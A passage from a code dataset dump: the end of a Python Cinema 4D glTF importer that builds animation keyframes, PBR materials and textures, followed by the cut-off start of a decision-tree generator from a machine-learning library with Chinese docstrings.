CHANNELS[ID][\"rest_data\"] = c4d_object.GetRelRot()\n\n # Add keyframes to fix the extrapolation due to the sequential trick\n for i in range(nAnimations):\n for ID in CHANNELS:\n c = CHANNELS[ID]\n if not len(c[\"time\"][i]): # Empty channel -> we fix it to the rest position\n pass\n c[\"time\"][i] = [ranges[i][\"start\"] + eps, ranges[i][\"end\"] - eps]\n c[\"data\"][i] = [c[\"rest_data\"], c[\"rest_data\"]] \n c[\"fixed\"][i] = 1\n\n else:\n # MIN\n t, d = c[\"time\"][i][0], c[\"data\"][i][0]\n if t > ranges[i][\"start\"] + eps:\n c[\"time\"][i].insert(0, ranges[i][\"start\"] + eps)\n c[\"data\"][i].insert(0, d)\n # MAX\n t, d = c[\"time\"][i][-1], c[\"data\"][i][-1]\n if t < ranges[i][\"end\"] - eps:\n c[\"time\"][i].append(ranges[i][\"end\"] - eps)\n c[\"data\"][i].append(d)\n\n # Add the keyframes\n for ani in range(nAnimations):\n for ID in CHANNELS:\n\n channel = CHANNELS[ID]\n\n # Read in the dict data\n path = channel[\"path\"]\n node_idx = channel[\"node\"]\n in_data = channel[\"time\"][ani]\n out_data = channel[\"data\"][ani]\n\n # Generate and get the C4D animation data\n # Create the track types\n trackType = None\n if path == \"translation\":\n trackType = c4d.ID_BASEOBJECT_REL_POSITION\n elif path == \"scale\":\n trackType = c4d.ID_BASEOBJECT_REL_SCALE\n elif path == \"rotation\":\n trackType = c4d.ID_BASEOBJECT_REL_ROTATION\n else:\n # This channel is linked to morphing, not supported for the moment\n self.has_morphing = True\n continue\n\n # Get the C4D object\n c4d_object = nodes[node_idx]\n\n # Get the tracks and curves\n tracks = []\n for axis in [c4d.VECTOR_X, c4d.VECTOR_Y, c4d.VECTOR_Z]:\n\n descid = c4d.DescID(\n c4d.DescLevel(trackType, c4d.DTYPE_VECTOR,0), \n c4d.DescLevel(axis, c4d.DTYPE_REAL,0)\n )\n descid = [trackType, axis]\n\n track = c4d_object.FindCTrack(descid)\n\n if track is None:\n track = c4d.CTrack(c4d_object, descid)\n c4d_object.InsertTrackSorted(track)\n\n tracks.append(track)\n\n # Get the F-Curves\n curves = [track.GetCurve() for track in tracks]\n\n # Create the keyframes\n for i,o in zip(in_data, out_data):\n \n data = None\n if channel[\"fixed\"][ani]:\n # Animation data for \"fixed\" keyframes\n data = o\n else:\n # Normal keyframes\n if path == \"rotation\":\n data = self.quat_to_eulerxyz(o)\n data = [data[0], data[1], -data[2]]\n elif path == \"translation\":\n data = c4d.Vector(o[0], o[1], -o[2])\n elif path == \"scale\":\n data = c4d.Vector(o[0], o[1], o[2])\n else:\n print(\"We don't support morph targets for now...\")\n\n # Get the time\n mytime = c4d.BaseTime(i)\n # Create a keyframe\n for j in range(3):\n key = c4d.CKey()\n key.SetTime(curves[j], mytime)\n key.SetValue(curves[j], data[j])\n curves[j].InsertKey(key)\n key.SetInterpolation(curves[j], c4d.CINTERPOLATION_LINEAR)\n key.SetQuatInterpolation(curves[j], c4d.ROTATIONINTERPOLATION_QUATERNION_SLERP)\n \n\n # Update\n c4d_object.Message(c4d.MSG_UPDATE)\n self.progress_callback(\"Importing animations\", anim_idx + 1, len(gltf.data.animations))\n\n # Add markers\n for ani in range(nAnimations):\n t = c4d.BaseTime(ranges[ani][\"start\"])\n c4d.documents.AddMarker(c4d.documents.GetActiveDocument(), pPred=None, time=t, name = gltf.data.animations[ani].name + \"_begin\")\n t = c4d.BaseTime(ranges[ani][\"end\"])\n c4d.documents.AddMarker(c4d.documents.GetActiveDocument(), pPred=None, time=t, name = gltf.data.animations[ani].name + \"_end\")\n\n c4d.EventAdd()\n\n #############################\n # MATERIALS\n #############################\n\n COLOR_BLACK = c4d.Vector(0.0, 0.0, 0.0)\n COLOR_WHITE = c4d.Vector(1.0, 1.0, 1.0)\n\n def get_texture_path(self):\n return os.path.join(os.path.split(c4d.documents.GetActiveDocument().GetParameter(c4d.DOCUMENT_FILEPATH, c4d.DESCFLAGS_GET_NONE))[0], 'tex')\n\n def setGradient(self, colorizer, low, high):\n gradient = colorizer.GetParameter(c4d.SLA_COLORIZER_GRADIENT, c4d.DESCFLAGS_SET_NONE)\n gradient.FlushKnots()\n gradient.InsertKnot(low, 1.0, 0, 0.5, 0)\n gradient.InsertKnot(high, 1.0, 1, 0, 1)\n colorizer.SetParameter(c4d.SLA_COLORIZER_GRADIENT, gradient, c4d.DESCFLAGS_SET_NONE)\n\n def setGradientBlackWhite(self, colorizer):\n self.setGradient(colorizer, self.COLOR_BLACK, self.COLOR_WHITE)\n\n def setGradientInvert(self, colorizer):\n self.setGradient(colorizer, self.COLOR_WHITE, self.COLOR_BLACK)\n\n def make_specular_diffuse(self, spec_gloss, mat):\n mat[c4d.MATERIAL_USE_COLOR] = True\n if 'diffuseTexture' not in spec_gloss:\n return\n\n diffusetexshader = self.gltf_textures[spec_gloss['diffuseTexture']['index']].to_c4d_shader()\n mat.SetParameter(c4d.MATERIAL_COLOR_SHADER, diffusetexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(diffusetexshader)\n\n def make_vertex_colors_layer(self, mat, colortag):\n vtxcolorshader = c4d.BaseShader(1011137)\n vtxcolorshader.SetParameter(c4d.SLA_DIRTY_VMAP_OBJECT, colortag, c4d.DESCFLAGS_GET_NONE)\n\n if not mat.GetParameter(c4d.MATERIAL_COLOR_SHADER, c4d.DESCFLAGS_SET_NONE):\n mat.SetParameter(c4d.MATERIAL_COLOR_SHADER, vtxcolorshader, c4d.DESCFLAGS_SET_NONE)\n\n # check if vertex color already enabled:\n if not colortag or mat.GetReflectionLayerIndex(0).GetName() == 'Vertex Colors':\n return\n\n vtx_color_diffuse = mat.AddReflectionLayer()\n vtx_color_diffuse.SetFlags(c4d.REFLECTION_FLAG_NONE)\n vtx_color_diffuse.SetName(\"Vertex Colors\")\n vtxcolorid = vtx_color_diffuse.GetDataID()\n mat.SetParameter(vtxcolorid + c4d.REFLECTION_LAYER_ENABLED, False, c4d.DESCFLAGS_SET_NONE)\n\n refid = vtxcolorid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION\n mat.SetParameter(refid, c4d.REFLECTION_DISTRIBUTION_LAMBERTIAN, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(vtxcolorid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, vtxcolorshader, c4d.DESCFLAGS_SET_NONE)\n\n mat.InsertShader(vtxcolorshader)\n\n def make_diffuse_layer(self, pbr_metal, mat):\n # Diffuse: set lambert + baseColor in color + inverted metal in LayerMask\n diffuse = mat.AddReflectionLayer()\n diffuse.SetName(\"BaseColor\")\n diffuseid = diffuse.GetDataID()\n\n # To lambert\n refid = diffuseid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION\n mat.SetParameter(refid, c4d.REFLECTION_DISTRIBUTION_LAMBERTIAN, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_factor:\n base_color_factor = pbr_metal.base_color_factor\n base_color = c4d.Vector(base_color_factor[0], base_color_factor[1], base_color_factor[2])\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_COLOR_COLOR, base_color, c4d.DESCFLAGS_SET_NONE)\n\n # Set base color texture\n if pbr_metal.base_color_texture:\n basecolortexshader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader()\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, basecolortexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(basecolortexshader)\n\n # Add inverter colorizer and set metalness texture\n if pbr_metal.metallic_roughness_texture:\n metaltexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n\n colorizer = c4d.BaseShader(c4d.Xcolorizer)\n colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, metaltexshader, c4d.DESCFLAGS_SET_NONE)\n colorizer.InsertShader(metaltexshader)\n colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_BLUE, c4d.DESCFLAGS_SET_NONE)\n self.setGradientInvert(colorizer)\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_TRANS_TEXTURE, colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(colorizer)\n\n # Report metallic factor\n metallic_factor = pbr_metal.metallic_factor if pbr_metal.metallic_factor is not None else 1.0\n mat.SetParameter(diffuseid + c4d.REFLECTION_LAYER_TRANS_MIX_STRENGTH, metallic_factor, c4d.DESCFLAGS_SET_NONE)\n\n def makeTextureShader(self, filepath, alpha_only=False):\n sha = c4d.BaseList2D(c4d.Xbitmap)\n sha[c4d.BITMAPSHADER_FILENAME] = filepath\n if alpha_only:\n ls = c4d.LayerSet()\n ls.SetMode(c4d.LAYERSETMODE_LAYERALPHA)\n sha[c4d.BITMAPSHADER_LAYERSET] = ls\n\n return sha\n\n def make_specular_layer(self, spec_gloss, mat):\n reflect = mat.AddReflectionLayer()\n reflect.SetName(\"Reflectance_specular\")\n reflectid = reflect.GetDataID()\n\n if 'specularFactor' in spec_gloss:\n spec = spec_gloss['specularFactor']\n specularColor = c4d.Vector(spec[0], spec[1], spec[2])\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_COLOR, specularColor, c4d.DESCFLAGS_SET_NONE)\n\n if 'specularGlossinessTexture' in spec_gloss:\n speculartexshader = self.gltf_textures[spec_gloss['specularGlossinessTexture']['index']].to_c4d_shader()\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION, c4d.REFLECTION_DISTRIBUTION_GGX, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, speculartexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(speculartexshader)\n\n glossinesstexshader = self.gltf_textures[spec_gloss['specularGlossinessTexture']['index']].to_c4d_shader(True)\n gloss_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n gloss_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_LUMINANCE, c4d.DESCFLAGS_SET_NONE)\n gloss_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, glossinesstexshader, c4d.DESCFLAGS_SET_NONE)\n gloss_colorizer.InsertShader(glossinesstexshader)\n self.setGradientInvert(gloss_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_SHADER_ROUGHNESS, gloss_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(gloss_colorizer)\n\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_VALUE_ROUGHNESS, spec_gloss.get('glossinessFactor', 1.0), c4d.DESCFLAGS_SET_NONE)\n\n def make_metallic_reflectance_layer(self, pbr_metal, mat):\n reflect = mat.AddReflectionLayer()\n reflect.SetName(\"Reflectance_metal\")\n reflectid = reflect.GetDataID()\n\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_FRESNEL_MODE, c4d.REFLECTION_FRESNEL_CONDUCTOR, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_factor:\n base_color_factor = pbr_metal.base_color_factor\n base_color = c4d.Vector(base_color_factor[0], base_color_factor[1], base_color_factor[2])\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_COLOR, base_color, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_texture:\n basecolortexshader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader()\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION, c4d.REFLECTION_DISTRIBUTION_GGX, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, basecolortexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(basecolortexshader)\n\n metallic_factor = pbr_metal.metallic_factor if pbr_metal.metallic_factor is not None else 1.0\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_TRANS_BRIGHTNESS, metallic_factor, c4d.DESCFLAGS_SET_NONE)\n\n roughness_factor = pbr_metal.roughness_factor if pbr_metal.roughness_factor is not None else 1.0\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_VALUE_ROUGHNESS, roughness_factor, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.metallic_roughness_texture:\n # Metalness\n metalnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n metal_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_BLUE, c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, metalnesstexshader, c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.InsertShader(metalnesstexshader)\n self.setGradientBlackWhite(metal_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_TRANS_TEXTURE, metal_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(metal_colorizer)\n\n # Roughness\n roughnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n rough_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_GREEN, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, roughnesstexshader, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.InsertShader(roughnesstexshader)\n self.setGradientBlackWhite(rough_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_SHADER_ROUGHNESS, rough_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(rough_colorizer)\n\n def make_dielectric_reflectance_layer(self, pbr_metal, mat):\n reflect = mat.AddReflectionLayer()\n reflect.SetName(\"Reflectance_dielectric\")\n reflectid = reflect.GetDataID()\n\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_FRESNEL_MODE, c4d.REFLECTION_FRESNEL_DIELECTRIC, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_factor:\n base_color_factor = pbr_metal.base_color_factor\n base_color = c4d.Vector(base_color_factor[0], base_color_factor[1], base_color_factor[2])\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_COLOR, base_color, c4d.DESCFLAGS_SET_NONE)\n\n if pbr_metal.base_color_texture:\n basecolortexshader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader()\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_DISTRIBUTION, c4d.REFLECTION_DISTRIBUTION_GGX, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_COLOR_TEXTURE, basecolortexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(basecolortexshader)\n\n if pbr_metal.metallic_roughness_texture:\n # Roughness\n roughnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n rough_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_GREEN, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, roughnesstexshader, c4d.DESCFLAGS_SET_NONE)\n rough_colorizer.InsertShader(roughnesstexshader)\n self.setGradientBlackWhite(rough_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_SHADER_ROUGHNESS, rough_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(rough_colorizer)\n\n # Metalness\n metalnesstexshader = self.gltf_textures[pbr_metal.metallic_roughness_texture.index].to_c4d_shader()\n metal_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_BLUE, c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, metalnesstexshader, c4d.DESCFLAGS_SET_NONE)\n metal_colorizer.InsertShader(metalnesstexshader)\n self.setGradientInvert(metal_colorizer)\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_TRANS_TEXTURE, metal_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(metal_colorizer)\n\n roughness_factor = pbr_metal.roughness_factor if pbr_metal.roughness_factor is not None else 1.0\n mat.SetParameter(reflectid + c4d.REFLECTION_LAYER_MAIN_VALUE_ROUGHNESS, roughness_factor, c4d.DESCFLAGS_SET_NONE)\n\n def set_normal_map(self, material, mat):\n if not material.normal_texture:\n return\n\n mat[c4d.MATERIAL_USE_NORMAL] = 1\n normaltexshader = self.gltf_textures[material.normal_texture.index].to_c4d_shader()\n mat.SetParameter(c4d.MATERIAL_NORMAL_SHADER, normaltexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(normaltexshader)\n\n def set_alpha(self, material, mat):\n if material.alpha_mode not in ('BLEND', 'MASK'):\n mat[c4d.MATERIAL_USE_ALPHA] = 0\n return\n\n mat[c4d.MATERIAL_USE_ALPHA] = 1\n alpha_factor = 1.0\n diffuse_alpha_shader = None\n\n if material.extensions and 'KHR_materials_pbrSpecularGlossiness' in material.extensions:\n pbr_specular = material.extensions['KHR_materials_pbrSpecularGlossiness']\n alpha_factor = pbr_specular['diffuse_factor'][3] if 'diffuse_factor' in pbr_specular else 1.0\n if 'diffuseTexture' in pbr_specular:\n diffuse_alpha_shader = self.gltf_textures[pbr_specular['diffuseTexture']['index']].to_c4d_shader(alpha_only=True)\n\n elif material.pbr_metallic_roughness:\n pbr_metal = material.pbr_metallic_roughness\n if pbr_metal.base_color_texture:\n diffuse_alpha_shader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader(alpha_only=True)\n if pbr_metal.base_color_factor:\n alpha_factor = pbr_metal.base_color_factor[3] if pbr_metal.base_color_factor else 1.0\n\n if material.alpha_mode == 'BLEND':\n mat.SetParameter(c4d.MATERIAL_ALPHA_SOFT, True, c4d.DESCFLAGS_SET_NONE)\n if diffuse_alpha_shader:\n mat.SetParameter(c4d.MATERIAL_ALPHA_IMAGEALPHA, True, c4d.DESCFLAGS_SET_NONE)\n\n diffuse_alpha_shader = diffuse_alpha_shader\n alpha_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n alpha_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, diffuse_alpha_shader, c4d.DESCFLAGS_SET_NONE)\n alpha_colorizer.InsertShader(diffuse_alpha_shader)\n alpha_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_LUMINANCE, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(c4d.MATERIAL_ALPHA_SHADER, alpha_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(alpha_colorizer)\n\n # Apply factor\n alpha_color_from_factor = c4d.Vector(alpha_factor, alpha_factor, alpha_factor)\n self.setGradient(alpha_colorizer, self.COLOR_BLACK, alpha_color_from_factor)\n else:\n mat.SetParameter(c4d.MATERIAL_ALPHA_IMAGEALPHA, False, c4d.DESCFLAGS_SET_NONE)\n alpha_color_shader = c4d.BaseShader(c4d.Xcolor)\n alpha_color_shader.SetParameter(c4d.COLORSHADER_COLOR, self.COLOR_WHITE, c4d.DESCFLAGS_SET_NONE)\n alpha_color_shader.SetParameter(c4d.COLORSHADER_BRIGHTNESS, alpha_factor, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(c4d.MATERIAL_ALPHA_SHADER, alpha_color_shader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(alpha_color_shader)\n\n elif material.alpha_mode == 'MASK': # # Masking without texture doesn't really make sense\n if diffuse_alpha_shader:\n mat.InsertShader(diffuse_alpha_shader)\n mat.SetParameter(c4d.MATERIAL_ALPHA_SHADER, diffuse_alpha_shader, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(c4d.MATERIAL_ALPHA_COLOR, self.COLOR_BLACK, c4d.DESCFLAGS_SET_NONE)\n cutoff = max(material.alpha_cutoff, 0.99) # a full white color makes everything fully transparent\n delta_color = c4d.Vector(cutoff, cutoff, cutoff)\n mat.SetParameter(c4d.MATERIAL_ALPHA_DELTA, delta_color, c4d.DESCFLAGS_SET_NONE)\n\n def set_emissive(self, material, mat):\n if not material.emissive_texture and not material.emissive_factor:\n return\n\n has_valid_emission = False\n\n if material.emissive_texture:\n emitShader = self.gltf_textures[material.emissive_texture.index].to_c4d_shader()\n mat.SetParameter(c4d.MATERIAL_LUMINANCE_SHADER, emitShader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(emitShader)\n has_valid_emission = True\n\n if material.emissive_factor:\n emit_factor = material.emissive_factor\n emit_color = c4d.Vector(emit_factor[0], emit_factor[1], emit_factor[2])\n mat.SetParameter(c4d.MATERIAL_LUMINANCE_COLOR, emit_color, c4d.DESCFLAGS_SET_NONE)\n if emit_factor[0] != 0.0 and emit_factor[1] != 0.0 and emit_factor[2] != 0.0:\n has_valid_emission = True\n\n if has_valid_emission:\n mat[c4d.MATERIAL_USE_LUMINANCE] = 1\n\n def create_material(self, name):\n mat = c4d.Material()\n mat.SetName(name)\n mat[c4d.MATERIAL_USE_ALPHA] = False\n mat[c4d.MATERIAL_USE_COLOR] = False\n mat[c4d.MATERIAL_USE_LUMINANCE] = False\n mat[c4d.MATERIAL_USE_NORMAL] = False\n mat[c4d.MATERIAL_USE_SPECULAR] = False\n mat[c4d.MATERIAL_USE_TRANSPARENCY] = False\n\n return mat\n\n def import_gltf_materials(self, gltf):\n ''' Might be replaced by imported c4d mat'''\n # Following tricks from https://forum.allegorithmic.com/index.php?topic=9757.0#msg85512\n materials = gltf.data.materials\n if not materials:\n return None\n\n imported_materials = {}\n for index, material in enumerate(materials):\n mat = self.create_material(material.name)\n\n if material.extensions and 'KHR_materials_pbrSpecularGlossiness' in material.extensions:\n mat[c4d.MATERIAL_USE_COLOR] = 1\n mat.RemoveReflectionAllLayers()\n spec_gloss = material.extensions['KHR_materials_pbrSpecularGlossiness']\n self.make_specular_diffuse(spec_gloss, mat)\n self.make_specular_layer(spec_gloss, mat)\n\n else:\n # Turn off Color\n mat[c4d.MATERIAL_USE_COLOR] = 0\n mat.RemoveReflectionAllLayers()\n\n pbr_metal = material.pbr_metallic_roughness\n if pbr_metal:\n self.make_diffuse_layer(pbr_metal, mat)\n self.make_metallic_reflectance_layer(pbr_metal, mat)\n self.make_dielectric_reflectance_layer(pbr_metal, mat)\n\n self.set_alpha(material, mat)\n self.set_normal_map(material, mat)\n self.set_emissive(material, mat)\n\n imported_materials[index] = mat\n self.progress_callback(\"Importing materials\", index + 1, len(materials))\n\n for index in imported_materials:\n c4d.documents.GetActiveDocument().InsertMaterial(imported_materials[index])\n\n return imported_materials\n\n def import_gltf_textures(self, gltf):\n dest_textures_path = self.get_texture_path()\n if not os.path.exists(dest_textures_path):\n os.mkdir(dest_textures_path)\n\n self.gltf_textures = []\n if gltf.data.textures is None:\n return\n\n for texture in gltf.data.textures:\n # 1. Copy texture to project directory\n image = gltf.data.images[texture.source]\n fullpath = os.path.join(self.model_dir, image.uri)\n if not os.path.exists(fullpath):\n print('Texture not found')\n return\n\n if not os.path.exists(dest_textures_path):\n os.mkdir(dest_textures_path)\n\n final_texture_path = os.path.join(dest_textures_path, '{}_{}'.format(texture.source, os.path.basename(fullpath)))\n if not os.path.exists(final_texture_path):\n shutil.copy(fullpath, final_texture_path)\n\n sampler = gltf.data.samplers[texture.sampler]\n texture = TextureWrapper(final_texture_path, sampler)\n\n # Copy texture to project textures directory\n self.gltf_textures.append(texture) # TODO use list instead\n self.progress_callback(\"Importing textures\", len(self.gltf_textures), len(gltf.data.images))\n\n print('Imported {} textures'.format(len(self.gltf_textures)))\n","sub_path":"sketchfab/import_gltf.py","file_name":"import_gltf.py","file_ext":"py","file_size_in_byte":53289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384363761","text":"\"\"\"classicML中树结构的生成器.\"\"\"\nimport pandas as pd\n\nfrom classicML.backend.training import get_criterion\n\n\nclass _TreeNode(object):\n \"\"\"树的结点.\n\n Attributes:\n num_of_leaves: int, default=None,\n 叶结点的数量, None表示没有叶结点, 即本身就是叶结点.\n leaf: bool, default=False,\n 是否为一个叶结点.\n height: int, default=-1,\n 当前结点的高度.\n category: str, default='',\n 当前结点的表示的类别.\n feature_name: str, default='',\n 当前结点表示划分的类别.\n feature_index: int, default=None,\n 当前结点表示划分的类别的下标.\n purity: float, default=None,\n 当前结点的纯度.\n continuous: bool, default=False,\n 是否是连续属性.\n subtree: dict, default={},\n 属性的分支, 即子树.\n dividing_point: float, default=None,\n 当前的结点是连续值时, 划分点的值.\n \"\"\"\n def __init__(self):\n self.num_of_leaves = None\n self.leaf = False\n self.height = -1\n self.category = ''\n self.feature_name = ''\n self.feature_index = None\n self.purity = None\n self.continuous = False\n self.subtree = dict()\n self.dividing_point = None\n\n def reset(self, category):\n \"\"\"重置结点.\n\n Arguments:\n category: str, 当前结点的表示的类别.\n \"\"\"\n self.num_of_leaves = 1\n self.height = 0\n self.category = category\n self.leaf = True\n self.feature_name = ''\n self.feature_index = None\n self.purity = None\n self.continuous = False\n self.subtree = dict()\n self.dividing_point = None\n\n\nclass TreeGenerator(object):\n \"\"\"树生成器的基类.\n\n Attributes:\n name: str, 生成器的名称.\n criterion: {'gain', 'gini', 'entropy'}, default='gain',\n 决策树学习的划分方式.\n \"\"\"\n def __init__(self, name=None, criterion=None):\n \"\"\"初始化生成器.\n\n Arguments:\n name: str, 生成器的名称.\n criterion: {'gain', 'gini', 'entropy'}, default='gain',\n 决策树学习的划分方式.\n \"\"\"\n super(TreeGenerator, self).__init__()\n self.name = name\n self.criterion = get_criterion(criterion)\n\n def __call__(self, *args, **kwargs):\n \"\"\"功能实现.\"\"\"\n return self.tree_generate(*args, **kwargs)\n\n def tree_generate(self, *args, **kwargs):\n \"\"\"树的生成实现.\"\"\"\n raise NotImplementedError\n\n\nclass DecisionTreeGenerator(TreeGenerator):\n \"\"\"决策树生成器.\n\n Attributes:\n _x: pandas.DataFrame,\n 未经训练的原始特征数据.\n 保存一份原始的数据必然会占用两倍的内存, 但是划分最优属性后, 应该为所有出现过的属性值进行生成分支(子结点).\n \"\"\"\n def __init__(self, name='decision_tree_generator', criterion=None):\n super(DecisionTreeGenerator, self).__init__(name=name,\n criterion=criterion)\n\n self._x = None\n\n def tree_generate(self, x, y):\n \"\"\"生成决策树.\n\n Arguments:\n x: pandas.DataFrame, 特征数据.\n y: pandas.DataFrame, 标签.\n\n Returns:\n DecisionTreeClassifier实例.\n \"\"\"\n decision_tree = _TreeNode()\n decision_tree.num_of_leaves = 0\n\n # 样本属于同一个类别.\n if y.nunique() == 1:\n decision_tree.num_of_leaves += 1\n decision_tree.leaf = True\n decision_tree.height = 0\n decision_tree.category = y.values[0]\n\n return decision_tree\n\n # 属性被测试完.\n if x.empty:\n decision_tree.num_of_leaves += 1\n decision_tree.leaf = True\n decision_tree.height = 0\n # TODO(Steve R. Sun, tag:code): 函数value_counts在两类元素值相同时, 不会按照某种顺序排序.\n # 而是随机返回, 因此可能遇到决策树生成不一样的情况. 应该重写此函数.\n decision_tree.category = pd.value_counts(y).index[0]\n\n return decision_tree\n\n # 选择最优划分.\n feature_name, list_of_purity = self.criterion.optimal_division(x, y)\n\n decision_tree.feature_name = feature_name\n decision_tree.feature_index = list(self._x.columns).index(decision_tree.feature_name)\n current_feature_values = self._x.loc[:, decision_tree.feature_name]\n decision_tree.purity = list_of_purity[0]\n\n if len(list_of_purity) != 1:\n decision_tree.continuous = True\n decision_tree.dividing_point = list_of_purity[1]\n\n # 使用二分法对连续值进行处理.\n greater_part = '>= {:.3f}'.format(decision_tree.dividing_point)\n less_part = '< {:.3f}'.format(decision_tree.dividing_point)\n decision_tree.subtree[greater_part] = self.tree_generate(\n x.loc[current_feature_values >= decision_tree.dividing_point],\n y.loc[current_feature_values >= decision_tree.dividing_point])\n decision_tree.subtree[less_part] = self.tree_generate(\n x.loc[current_feature_values < decision_tree.dividing_point],\n y.loc[current_feature_values < decision_tree.dividing_point])\n\n decision_tree.num_of_leaves += (decision_tree.subtree[greater_part].num_of_leaves\n + decision_tree.subtree[less_part].num_of_leaves)\n decision_tree.height = (decision_tree.subtree[greater_part].height\n + decision_tree.subtree[less_part].height) + 1\n else:\n decision_tree.continuous = False\n\n feature_values = pd.unique(current_feature_values)\n sub_x = x.drop(decision_tree.feature_name, axis=1) # 最优属性相当于已被使用掉.\n\n max_height = -1\n # 为每个属性值生成一个分支.\n for feature_value in feature_values:\n if y[current_feature_values == feature_value].empty is True:\n decision_tree.subtree[feature_value] = self.tree_generate(\n sub_x.loc[current_feature_values == feature_value],\n y) # 如果为空, 理论上标记是数据集中出现的最多的样本, 但是这样并不好通过递归实现, 于是此处传入父节点的样本标记.\n else:\n decision_tree.subtree[feature_value] = self.tree_generate(\n sub_x.loc[current_feature_values == feature_value],\n y.loc[current_feature_values == feature_value])\n\n # 更新子树的高度.\n if decision_tree.subtree[feature_value].height > max_height:\n max_height = decision_tree.subtree[feature_value].height\n\n decision_tree.num_of_leaves += decision_tree.subtree[feature_value].num_of_leaves\n\n decision_tree.height = max_height + 1\n\n return 